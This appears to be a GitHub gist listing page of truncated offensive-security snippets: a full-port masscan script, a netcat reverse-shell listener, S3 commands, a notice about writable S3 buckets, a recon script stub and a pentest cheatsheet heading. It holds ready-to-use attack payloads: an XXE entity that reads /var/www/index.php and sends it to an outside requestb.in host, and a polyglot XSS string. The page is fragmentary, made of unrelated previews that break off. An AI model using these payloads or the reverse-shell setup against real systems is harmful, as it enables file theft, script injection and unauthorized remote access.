@prosecurity
prosecurity / mass-scan.sh
Created September 9, 2019 17:55 — forked from random-robbie/mass-scan.sh
mass-scan
#!/bin/bash
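# Strip the URL scheme so only the hostname remains
strip=$(echo "$1" | sed 's/https\?:\/\///')
echo ""
echo "######################################"
echo "$strip"
echo "######################################"
echo ""
# Resolve the host's first IPv4 address, scan all TCP ports, and log the output to <host>_scan
masscan -p1-65535 "$(dig +short "$strip" | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | head -1)" --max-rate 1000 |& tee "${strip}_scan"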

How to get reverse shell

Set up a listener on your VPS to connect back to

nc -lvp 4444

Some S3 Commands

// Copy MyFile.txt in current directory to s3://my-bucket/path
$ aws s3 cp MyFile.txt s3://my-bucket/path/

// Move all .jpg files in s3://my-bucket/path to ./MyDirectory
$ aws s3 mv s3://my-bucket/path ./MyDirectory --exclude '*' --include '*.jpg' --recursive

If you are reading this, there is a chance you have a poc.txt in your S3 bucket.

This is just a little heads-up: attackers can upload and overwrite files in your S3 bucket, and if you are serving files such as JS from it, they can add an XSS payload or Coinhive to your JS.

Log in to your AWS console, find the bucket, and remove the public-write permission from it; this will fix the issue.

How to test an S3 bucket for bad permissions

prosecurity / master_script.sh
Created September 4, 2019 11:57 — forked from LuD1161/master_script.sh
Master Script to automate all the recon
#!/bin/bash
# Require the nmap scan mode (basic or advanced) as the second argument
if [ -z "$2" ]
then
    echo "2nd argument not supplied"
    echo "2nd argument can be basic or advanced; it is used for nmap"
    echo "Usage: ./master_script.sh domain basic|advanced"
    exit 1
fi

Master

"Knowledge is powerful, be careful how you use it!"

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/index.php">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'https://requestb.in/141gy131?log=%payload;'>">
<script>document.write('123')</script>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
prosecurity / pwk-cheatsheet.md
Created July 19, 2019 22:41
Removed PWK Cheatsheet by sergey-pronin

PWK-CheatSheet
